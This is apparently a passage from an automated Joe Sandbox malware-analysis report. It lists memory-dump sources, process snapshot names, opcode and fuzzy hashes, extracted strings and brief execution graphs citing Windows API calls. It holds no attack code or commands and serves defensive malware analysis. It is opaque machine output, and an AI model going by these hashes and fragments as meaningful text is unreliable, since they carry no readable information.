                                      • Associated: 00000000.00000002.2133322697.0000000000982000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2133322697.0000000000AC3000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2133322697.0000000000AC8000.00000040.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_890000_Fatality.jbxd
                                      Similarity
                                      • API ID: AllocVirtual
                                      • String ID:
                                      • API String ID: 4275171209-0
                                      • Opcode ID: 2d754ba70357134bb1bda5704d546edec6076563c3be4aa21c32559dee696d27
                                      • Instruction ID: 5842adc24d3e2466c747e77c8383129f6378568ac83a843bb33002e1e14e18bd
                                      • Opcode Fuzzy Hash: 2d754ba70357134bb1bda5704d546edec6076563c3be4aa21c32559dee696d27
                                      • Instruction Fuzzy Hash: 11E0E2B6300248AFDB10CE8DD984BAA33ADE7A8310F108022FA09D7244C234EC109B75
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2134426104.0000000004D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D50000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_4d50000_Fatality.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: b=q=
                                      • API String ID: 0-4069823217
                                      • Opcode ID: 1eea809ff47755f36f4d44d512b906b218fed69a3a009f451abeb400a6c7ed6b
                                      • Instruction ID: 85a17c62061f2cebd06cea74c3e966c9c8b5cf5c10a6cff03fa6f4bcada07484
                                      • Opcode Fuzzy Hash: 1eea809ff47755f36f4d44d512b906b218fed69a3a009f451abeb400a6c7ed6b
                                      • Instruction Fuzzy Hash: 33314631549396AFCB328E3884A13C7BFE2AF562013E659AFC4C08B406D72154C7DB87
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2133322697.0000000000982000.00000040.00000001.01000000.00000003.sdmp, Offset: 00982000, based on PE: true
                                      • Associated: 00000000.00000002.2133322697.0000000000AC3000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2133322697.0000000000AC8000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2133322697.0000000000AE3000.00000040.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_890000_Fatality.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 0808f1a434eba70c5827684152b3468975e9ea97352dac9f2d26535adab3be0f
                                      • Instruction ID: 90daf189f63cdbc19fd03fac4175d8c0b5510ba17363d08faeb85bfd351d7a7d
                                      • Opcode Fuzzy Hash: 0808f1a434eba70c5827684152b3468975e9ea97352dac9f2d26535adab3be0f
                                      • Instruction Fuzzy Hash: A802F50104D3C5AFCB124B785D6B9693FAD9A0320071BC0DA96CA6A9A3E50B1F1FD736
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2134426104.0000000004D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D50000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_4d50000_Fatality.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: f4e4fd7c14cf299149dc289b34e608c463a9bc0b2b6099f3b3778437b4cfc2ec
                                      • Instruction ID: 3b1f6743c394aa3fc5802f77949fc75730ae0c9b42fbfab9a98173913d76f6f8
                                      • Opcode Fuzzy Hash: f4e4fd7c14cf299149dc289b34e608c463a9bc0b2b6099f3b3778437b4cfc2ec
                                      • Instruction Fuzzy Hash: 27815D76D0122A8FCFA5DF25CD886A9B7B5AF44701F5681DADC0AB3250EB315E85CF40
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2134426104.0000000004D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D50000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_4d50000_Fatality.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 80ce55ebeb7bf2b22fe6f36d6edc396e0e641356ce03f58a1c782874589ff798
                                      • Instruction ID: c8bb727a293c23f69e4de50643553fe2ddd5dc986fc501b842b1e242c9b9ec0e
                                      • Opcode Fuzzy Hash: 80ce55ebeb7bf2b22fe6f36d6edc396e0e641356ce03f58a1c782874589ff798
                                      • Instruction Fuzzy Hash: BF615E75D0122A9FCFA59F29CC886D9B7B5BF44311F1282D9D84EA3250EB309E85DF50

                                      Execution Graph

                                      Execution Coverage:11.1%
                                      Dynamic/Decrypted Code Coverage:100%
                                      Signature Coverage:0%
                                      Total number of Nodes:3
                                      Total number of Limit Nodes:0
                                      execution_graph 7254 7ffd34a5de01 7256 7ffd34a5de1f QueryFullProcessImageNameA 7254->7256 7257 7ffd34a5dfc4 7256->7257

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 261 7ffd34660d4c-7ffd34660e8b call 7ffd346607f8 277 7ffd34660e8c-7ffd34660eb9 261->277 280 7ffd34660ebb-7ffd34660f05 277->280 284 7ffd34660f1e 280->284 285 7ffd34660f07-7ffd34660f1d 280->285 286 7ffd34660f1f-7ffd34660f67 284->286 285->284 285->286 291 7ffd34660f6f-7ffd34661050 286->291
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2352266566.00007FFD34660000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34660000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_7ffd34660000_BridgeInto.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 5[_H
                                      • API String ID: 0-3279724263
                                      • Opcode ID: 01c3e6eb105984567f8cc2edc9ad346dac48fa6647ca47959d292b2ebb4ffd7f
                                      • Instruction ID: 228a4634f1a5e3cefb4d927a8783be6d23821283d1921ed9593ade828825dbe6
                                      • Opcode Fuzzy Hash: 01c3e6eb105984567f8cc2edc9ad346dac48fa6647ca47959d292b2ebb4ffd7f
                                      • Instruction Fuzzy Hash: 5591C075A18B998FE799DB68C8653E97FE1FBA6310F4001BAD049D77E2DB7828118700

                                      Control-flow Graph

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2356110070.00007FFD34A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A50000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_7ffd34a50000_BridgeInto.jbxd
                                      Similarity
                                      • API ID: FullImageNameProcessQuery
                                      • String ID:
                                      • API String ID: 3578328331-0
                                      • Opcode ID: 544e5d47f5bc49c3d9cdb4906f975a9a7ff183d0d2d3da059173d00f2a19d087
                                      • Instruction ID: 75238918e139148484ffacbf7d8940d9b9ef408a30f2ff456341dc3a9ae943a6
                                      • Opcode Fuzzy Hash: 544e5d47f5bc49c3d9cdb4906f975a9a7ff183d0d2d3da059173d00f2a19d087
                                      • Instruction Fuzzy Hash: 8671B530608A4D8FEB68DF18D8957F937D1FB59315F10827EE88EC7292CA74A845CB81
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2352266566.00007FFD34660000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34660000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_7ffd34660000_BridgeInto.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: c9$!k9$"s9$#{9
                                      • API String ID: 0-1692736845
                                      • Opcode ID: 9f2e64bf36a39c19fe3cea799ef3ffe929734340d48cb4f446d7f1047f3c4917
                                      • Instruction ID: 836afbb4862616b3cbf403127ac25d4bef448b44617d2dc931181eb1fa10088c
                                      • Opcode Fuzzy Hash: 9f2e64bf36a39c19fe3cea799ef3ffe929734340d48cb4f446d7f1047f3c4917
                                      • Instruction Fuzzy Hash: 29518F0BB9CA6355E22136FDB0615FF6B88DFE537EB084677E18CD90838D0C648586E5

                                      Execution Graph

                                      Execution Coverage:4.9%
                                      Dynamic/Decrypted Code Coverage:66.7%
                                      Signature Coverage:0%
                                      Total number of Nodes:3
                                      Total number of Limit Nodes:0
                                      execution_graph 29107 7ffd346b8030 29108 7ffd346b8039 FindCloseChangeNotification 29107->29108 29110 7ffd346cef24 29108->29110

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 461 7ffd34670d4c-7ffd34670eb9 call 7ffd346707f8 479 7ffd34670eed-7ffd34670f05 461->479 480 7ffd34670ebb-7ffd34670ee3 461->480 483 7ffd34670f1e 479->483 484 7ffd34670f07-7ffd34670f1d 479->484 480->479 486 7ffd34670f1f-7ffd34670f67 483->486 484->483 484->486 491 7ffd34670f6f-7ffd34671050 486->491
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000019.00000002.3416172132.00007FFD34670000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34670000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_25_2_7ffd34670000_EoNanmDGxPEtougVgAjHLx.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 5Z_H
                                      • API String ID: 0-3267294416
                                      • Opcode ID: ca5812c185428d632471ebc4cf242259001675015f75cc9d3f57fb659b1ed200
                                      • Instruction ID: 5657be59aca262bd08c0b2ec277a90a0e2077f77993e76108729366cb20e4bd9
                                      • Opcode Fuzzy Hash: ca5812c185428d632471ebc4cf242259001675015f75cc9d3f57fb659b1ed200
                                      • Instruction Fuzzy Hash: D291D175A18B998FE796DB68C8653E97FE1FBA6304F4040AED04DD72E2CB7824108750

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000019.00000002.3423401693.00007FFD34A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A60000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_25_2_7ffd34a60000_EoNanmDGxPEtougVgAjHLx.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: xom4
                                      • API String ID: 0-1034107437
                                      • Opcode ID: d516dd488c9554b5d23093aacf59badde25eced33e37e9ca781861c7b2ce30f9
                                      • Instruction ID: 00043e74b27e145bab14cfdd8fae20257be1af581fb39d81beb636b7fdca0c91
                                      • Opcode Fuzzy Hash: d516dd488c9554b5d23093aacf59badde25eced33e37e9ca781861c7b2ce30f9
                                      • Instruction Fuzzy Hash: 31E13470A0CB468FE369CB28C4E0575B7E5FF46328B24457EC58EC7692DA2DB842DB41

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 448 7ffd346b8030-7ffd346b8044 450 7ffd346b8046-7ffd346b806c 448->450 451 7ffd346b807a-7ffd346cef22 FindCloseChangeNotification 448->451 450->451 458 7ffd346cef2a-7ffd346cef58 451->458 459 7ffd346cef24 451->459 459->458

                                      Memory Dump Source
                                      • Source File: 00000019.00000002.3423401693.00007FFD34A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A60000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_25_2_7ffd34a60000_EoNanmDGxPEtougVgAjHLx.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 3587e2a829fbe020745e0a87864e02bf2c9e188eea126d505d09aa10568b8b9a
                                      • Instruction ID: 8860c589e78c1e200cbcd7237385bd56ab00a4f9f2c2d12da2f0dc98ae9525ac
                                      • Opcode Fuzzy Hash: 3587e2a829fbe020745e0a87864e02bf2c9e188eea126d505d09aa10568b8b9a
                                      • Instruction Fuzzy Hash: EF616F3170C44D4FE768DA1888B65B937D0FF66338B2402B9D19EC75A2DF1CA845A781
                                      Memory Dump Source
                                      • Source File: 00000019.00000002.3423401693.00007FFD34A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A60000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_25_2_7ffd34a60000_EoNanmDGxPEtougVgAjHLx.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 49483ae4266f49a10c71f0bb528069bf83333f0d54983281eaf0e2f4c435e557
                                      • Instruction ID: 83390a3aa0fb24e57313f0024744b8b1665bea6dee1981369f0a94f788cbd541
                                      • Opcode Fuzzy Hash: 49483ae4266f49a10c71f0bb528069bf83333f0d54983281eaf0e2f4c435e557
                                      • Instruction Fuzzy Hash: C671D130E1D64A8EEB65DB6488A46FCBBA5FF5A318F240479D14FD3192DE2C6841EB00
                                      Memory Dump Source
                                      • Source File: 00000019.00000002.3423401693.00007FFD34A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A60000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_25_2_7ffd34a60000_EoNanmDGxPEtougVgAjHLx.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: debb02fb1a434676feb9af9aa7673d57a0df34156d656e44fce8f9498dcf7f35
                                      • Instruction ID: 813c66014bf82e8b3ce5053faa00a220e520476c0871af9c83e54ea055f8572a
                                      • Opcode Fuzzy Hash: debb02fb1a434676feb9af9aa7673d57a0df34156d656e44fce8f9498dcf7f35
                                      • Instruction Fuzzy Hash: 3051C130A185468BEB1E8F08D4F45B17BA1FF52328B6845BDC55BCB58BCA3CE442D751
                                      Memory Dump Source
                                      • Source File: 00000019.00000002.3416172132.00007FFD34670000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34670000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_25_2_7ffd34670000_EoNanmDGxPEtougVgAjHLx.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 96eaaab7907db59c5e9c261e54b015b41a90df8e5c9c15836d384e321062bb8c
                                      • Instruction ID: b243aea91e8d69f4ba5a3beddb14fc92c2972928b0aa9c25ad23d9e29c5cd3a4
                                      • Opcode Fuzzy Hash: 96eaaab7907db59c5e9c261e54b015b41a90df8e5c9c15836d384e321062bb8c
                                      • Instruction Fuzzy Hash: 6441153270CA654FD724EBACE4A99FA7BD0EF9632570445BBD1CACB063DD14AC818781
                                      Memory Dump Source
                                      • Source File: 00000019.00000002.3423401693.00007FFD34A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A60000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_25_2_7ffd34a60000_EoNanmDGxPEtougVgAjHLx.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 58c80c4deb574392e738db1c8f957130aa31a01ecb5a6a43071fe0d62862ed15
                                      • Instruction ID: aef78a5b44cb16b4fbe5dd4317e928a848bb243bdfee8ee9c1219d39535f5940
                                      • Opcode Fuzzy Hash: 58c80c4deb574392e738db1c8f957130aa31a01ecb5a6a43071fe0d62862ed15
                                      • Instruction Fuzzy Hash: 91513171A086598FDBA4DB18C4A4BE977B1FB69314F1040BED10EE3291DA386985DF40
                                      Memory Dump Source
                                      • Source File: 00000019.00000002.3416172132.00007FFD34670000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34670000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_25_2_7ffd34670000_EoNanmDGxPEtougVgAjHLx.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 0c744d5d0e7dc7bad98310490ce563dae76bc6ebd58bba821232b2b278cc90ad
                                      • Instruction ID: 72c5fa8b5bc6c608af0a5bd982c5acfe027d8ccb4e8e6dba1e108d14346542b0
                                      • Opcode Fuzzy Hash: 0c744d5d0e7dc7bad98310490ce563dae76bc6ebd58bba821232b2b278cc90ad
                                      • Instruction Fuzzy Hash: 09414822B0D6650EE724B6F8A8BA1FA7F84DF96335B1444BFD18EC71D3CD1C68418285
                                      Memory Dump Source
                                      • Source File: 00000019.00000002.3416172132.00007FFD34670000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34670000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_25_2_7ffd34670000_EoNanmDGxPEtougVgAjHLx.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: ce8f7358e45c3f104609eb0a12fc78ee915a3f93e018420347aa5647d3a8c25d
                                      • Instruction ID: 6462fa71fe8e742d67706f6a37a40c474d60e574d64dee86b160247080887684
                                      • Opcode Fuzzy Hash: ce8f7358e45c3f104609eb0a12fc78ee915a3f93e018420347aa5647d3a8c25d
                                      • Instruction Fuzzy Hash: FE412920B1D9194FE798FB688CBA6B47BD5EFAA315B5440BDE40EC32D3DD2CA8418344
                                      Memory Dump Source
                                      • Source File: 00000019.00000002.3423401693.00007FFD34A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A60000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_25_2_7ffd34a60000_EoNanmDGxPEtougVgAjHLx.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 74561d9a7f16a8a91c458e4246572c3ab30f80ae78c9bb743797db063f37dccc
                                      • Instruction ID: 61036f3517227f83ea4257d0a24c41d2daeb9259715ce85db6974ef8750b6184
                                      • Opcode Fuzzy Hash: 74561d9a7f16a8a91c458e4246572c3ab30f80ae78c9bb743797db063f37dccc
                                      • Instruction Fuzzy Hash: C741843160C9098FDF98FF18D4A99A4B3E1FBA9328714016ED05EC7282CE29EC45CB85
                                      Memory Dump Source
                                      • Source File: 00000019.00000002.3423401693.00007FFD34A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A60000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_25_2_7ffd34a60000_EoNanmDGxPEtougVgAjHLx.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 1d2a489a3f3e13c46f5f131e68dbec67b3839268b859d2e815be6ac3b8835fed
                                      • Instruction ID: 28b8edec72f7143cbba074928e3c12385609642507ec7c46a5d14c0df890d3e6
                                      • Opcode Fuzzy Hash: 1d2a489a3f3e13c46f5f131e68dbec67b3839268b859d2e815be6ac3b8835fed
                                      • Instruction Fuzzy Hash: 3A419F34A0D6C99FDB56DB6488744AC7FB0EF97314B1800ABC14AEB193CA6C5845E712
                                      Memory Dump Source
                                      • Source File: 00000019.00000002.3423401693.00007FFD34A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A60000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_25_2_7ffd34a60000_EoNanmDGxPEtougVgAjHLx.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 24d5681cb29e2a1832c563dd0ea1c089fc484f20da922f6199885908cfdfb17e
                                      • Instruction ID: acde16a21267e4e90f81b0793084ffec4132e775e7c60a3521024ec317cf1994
                                      • Opcode Fuzzy Hash: 24d5681cb29e2a1832c563dd0ea1c089fc484f20da922f6199885908cfdfb17e
                                      • Instruction Fuzzy Hash: 2A41743270C9458FDB88EF28C4A59A9B3E1FBB9324714016ED54EC7292DE29E845CB85
                                      Memory Dump Source
                                      • Source File: 00000019.00000002.3423401693.00007FFD34A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A60000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_25_2_7ffd34a60000_EoNanmDGxPEtougVgAjHLx.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 062a03e1ce7d91faa5c7d3295eb840a46cb998292bc11dfb38008399c3fa91f6
                                      • Instruction ID: 1ccf196cb541e0c3686e008ead386a60f3b6189d4cb7eea5f48c528acb29d584
                                      • Opcode Fuzzy Hash: 062a03e1ce7d91faa5c7d3295eb840a46cb998292bc11dfb38008399c3fa91f6
                                      • Instruction Fuzzy Hash: AD31633160C9458FDB98EF1CC4A9EA4B7E1FBB931871401AED45EC7292CE29EC45CB85
                                      Memory Dump Source
                                      • Source File: 00000019.00000002.3423401693.00007FFD34A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A60000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_25_2_7ffd34a60000_EoNanmDGxPEtougVgAjHLx.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: fbb1845154e69a411ac3cedfb23a376eb8c412413904d5b44a72980f6534ce77
                                      • Instruction ID: b6385d35e9d3b1668badac9711feddaeef91398bb049696d06675c59da86b703
                                      • Opcode Fuzzy Hash: fbb1845154e69a411ac3cedfb23a376eb8c412413904d5b44a72980f6534ce77
                                      • Instruction Fuzzy Hash: A631853170C9458FDB59EF28C4A59A4B3E1FBB931471401AED44EC72A3CE29E845CB81
                                      Memory Dump Source
                                      • Source File: 00000019.00000002.3416172132.00007FFD34670000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34670000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_25_2_7ffd34670000_EoNanmDGxPEtougVgAjHLx.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 0cc6d291224cff623f15b76e085ee268e028e3e3f7966c47599f22330fc3e73a
                                      • Instruction ID: cab018fffbddeebe180e5f702fddd9dc9dd0e53faa08d72be1b0c9af4aa03b65
                                      • Opcode Fuzzy Hash: 0cc6d291224cff623f15b76e085ee268e028e3e3f7966c47599f22330fc3e73a
                                      • Instruction Fuzzy Hash: 1021D83130CC184FE768EA5CEC89DB977D1EB5A32170541BAE58EC7165E921EC9287C1
                                      Memory Dump Source
                                      • Source File: 00000019.00000002.3416172132.00007FFD34670000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34670000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_25_2_7ffd34670000_EoNanmDGxPEtougVgAjHLx.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: d8af5323603c6004bf07dfcbb24a13b0b72735509273424a038588142a898d7d
                                      • Instruction ID: aebab67e17beb0d4e8636a59fabb75ae507ad3272a09707b4af24e795bc17a20
                                      • Opcode Fuzzy Hash: d8af5323603c6004bf07dfcbb24a13b0b72735509273424a038588142a898d7d
                                      • Instruction Fuzzy Hash: F941A431A096598FEF85EF68CCA59E97FE1EF5A310B0441BBD109DB293DA2DA841C740
                                      Memory Dump Source
                                      • Source File: 00000019.00000002.3416172132.00007FFD34670000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34670000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_25_2_7ffd34670000_EoNanmDGxPEtougVgAjHLx.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 27b5b61b8588cd450eb921844a2ede7f2418db0e9987a64dc6719032cdebded4
                                      • Instruction ID: 97d8ffb4d2494d9c7be91b5d59758f8823caa31b9b96751df0def1a187527b95
                                      • Opcode Fuzzy Hash: 27b5b61b8588cd450eb921844a2ede7f2418db0e9987a64dc6719032cdebded4
                                      • Instruction Fuzzy Hash: 34314B21B0DA251FF764B6B8A8AA1FA7BC5DF95325B1440BED04EC31D3CC1C68414285
                                      Memory Dump Source
                                      • Source File: 00000019.00000002.3423401693.00007FFD34A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A60000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_25_2_7ffd34a60000_EoNanmDGxPEtougVgAjHLx.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: ba312fc20fe1a6bcb90b1044fd3a6365b8d8e75f08783102c8c14fdb8152f721
                                      • Instruction ID: 2dd8b63cb638036a19ebb5e464548cf41471825dd6792bf9ff82ce20a4b6650a
                                      • Opcode Fuzzy Hash: ba312fc20fe1a6bcb90b1044fd3a6365b8d8e75f08783102c8c14fdb8152f721
                                      • Instruction Fuzzy Hash: ED31543160C9498FDB98EF18C4A9AA4B3E1FBB9318714016ED45EC7292DE29E845CB85
                                      Memory Dump Source
                                      • Source File: 00000019.00000002.3423401693.00007FFD34A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A60000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_25_2_7ffd34a60000_EoNanmDGxPEtougVgAjHLx.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 825d6928c34d9350163f038f78646d5f55f8afd5c5a6bf95b0ac986cdff63461
                                      • Instruction ID: 3ca2cb1c9b75a0c7f3dfd1d4f32981093e98e7d960d6454c5c694f25b99ef3d4
                                      • Opcode Fuzzy Hash: 825d6928c34d9350163f038f78646d5f55f8afd5c5a6bf95b0ac986cdff63461
                                      • Instruction Fuzzy Hash: 7231643170C9458FDB98EF28C0A59A5B3E1FBB931471401ADD44EC72A2DE29F845CB81
                                      Memory Dump Source
                                      • Source File: 00000019.00000002.3423401693.00007FFD34A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A60000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_25_2_7ffd34a60000_EoNanmDGxPEtougVgAjHLx.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: f263ed515c96dfeb9b9493dacbdaa5acfd20ddce6787eb5cc4afe811d4defaef
                                      • Instruction ID: f6501ad8cea20013cd3bcbda81bbb05b9c6506b66f779697592cec72c3c66a71
                                      • Opcode Fuzzy Hash: f263ed515c96dfeb9b9493dacbdaa5acfd20ddce6787eb5cc4afe811d4defaef
                                      • Instruction Fuzzy Hash: 55312D71B0890A4FD788DE5CD4A19B9B7E2FF9A324B50427ED15ED3681CF28B8528780
                                      Memory Dump Source
                                      • Source File: 00000019.00000002.3423401693.00007FFD34A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A60000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_25_2_7ffd34a60000_EoNanmDGxPEtougVgAjHLx.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 87e4ad4210f46adb789d39744928d04744df0d7fe9828500eaba3cf2872e0c40
                                      • Instruction ID: b61e11aa419a2f64dbfa52aafbdcb267f75d95e55671196380d4ee3159c0b8b9
                                      • Opcode Fuzzy Hash: 87e4ad4210f46adb789d39744928d04744df0d7fe9828500eaba3cf2872e0c40
                                      • Instruction Fuzzy Hash: FE315231B1C91A4FDB48DA1CD4A19B8B7E2FF9A324B544179D11ED7686CE28BC12DB80
                                      Memory Dump Source
                                      • Source File: 00000019.00000002.3416172132.00007FFD34670000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34670000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_25_2_7ffd34670000_EoNanmDGxPEtougVgAjHLx.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 31e27acd981d6305dce7dc649281f063472e2224b592fc1fd91366535cd79a05
                                      • Instruction ID: b66a75b3cab4a5fb8b542a678aee0a0a3ef773348762d42cd43a1863ead83f72
                                      • Opcode Fuzzy Hash: 31e27acd981d6305dce7dc649281f063472e2224b592fc1fd91366535cd79a05
                                      • Instruction Fuzzy Hash: 28313A75B0DA598FE7119FA88CA12ED7FA0EF43325F1480B6D248CB1C3D93CA44697A1
                                      Memory Dump Source
                                      • Source File: 00000019.00000002.3423401693.00007FFD34A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A60000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_25_2_7ffd34a60000_EoNanmDGxPEtougVgAjHLx.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 05b1c6aa95fd6413e18a6932b943fbb219e06489e1312c002a1be511f5002767
                                      • Instruction ID: d95adf9358fa1fd90183871273805343aba42898a6626eb94a18a0b3846614de
                                      • Opcode Fuzzy Hash: 05b1c6aa95fd6413e18a6932b943fbb219e06489e1312c002a1be511f5002767
                                      • Instruction Fuzzy Hash: FD312871F1CA490FE749DB6888B12A8B7D2FF8A368F64017DD14EE75C2DD1C68028380
                                      Memory Dump Source
                                      • Source File: 00000019.00000002.3423401693.00007FFD34A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A60000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_25_2_7ffd34a60000_EoNanmDGxPEtougVgAjHLx.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 70a628f14d9aad8ceaffa93bc3141c3c27624f0883f6f4d382e1c2788f48f69a
                                      • Instruction ID: 697e2344161ad11c88b7edb20084c003163dceae21d642cbaa533600dbf1e8d7
                                      • Opcode Fuzzy Hash: 70a628f14d9aad8ceaffa93bc3141c3c27624f0883f6f4d382e1c2788f48f69a
